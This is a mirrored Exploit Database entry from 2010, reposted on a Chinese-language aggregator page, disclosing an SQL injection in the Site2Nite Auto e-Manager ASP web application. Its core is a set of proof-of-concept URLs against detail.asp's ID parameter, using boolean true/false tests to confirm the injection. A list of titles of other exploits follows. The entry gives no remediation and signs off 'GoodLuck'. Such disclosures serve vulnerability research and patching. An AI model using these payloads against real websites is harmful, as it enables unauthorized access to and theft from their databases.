Site2Nite Auto e-Manager – SQL Injection

Exploit Database
11 阅读

作者： KnocKout

日期： 2010-10-10
类别：
- webapps
平台：
- asp
来源：https://www.exploit-db.com/exploits/15230/

==================================================
Auto e-Manager <= SQL Injection Vulnerability
==================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
 { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Auto e-Manager
~Software: http://www.site2nite.com/
~Vulnerability Style : SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
~~~~~~~~ Explotation~~~~~~~~~~~

 http://VICTIM/www/detail.asp?ID=654 {SQL Injection}
 http://VICTIM/www/detail.asp?ID=654 and 1=1{True}
 http://VICTIM/www/detail.asp?ID=654 and 1=0{False}
 
================================

 GoodLuck.

last Exploits
Site2Nite Auto e-Manager – SQL Injection的更多信息

60 cycleCMS 2.5.2 – Cross-Site Request Forgery (Change Username and Password)：
Lot Reservation Management System 1.0 – Authentication Bypass：
PHP-Lance 1.52 – ‘subcat’ SQL Injection：
ZeroCMS 1.0 – ‘zero_view_article.php’ SQL Injection：
DZCP (deV!L`z Clanportal) Witze Addon 0.9 – SQL Injection：
The Pacer Edition CMS 2.1 – ’email’ Cross-Site Scripting：
Battle Scrypt – Arbitrary File Upload：
eNdonesia Portal 8.7 – ‘artid’ SQL Injection：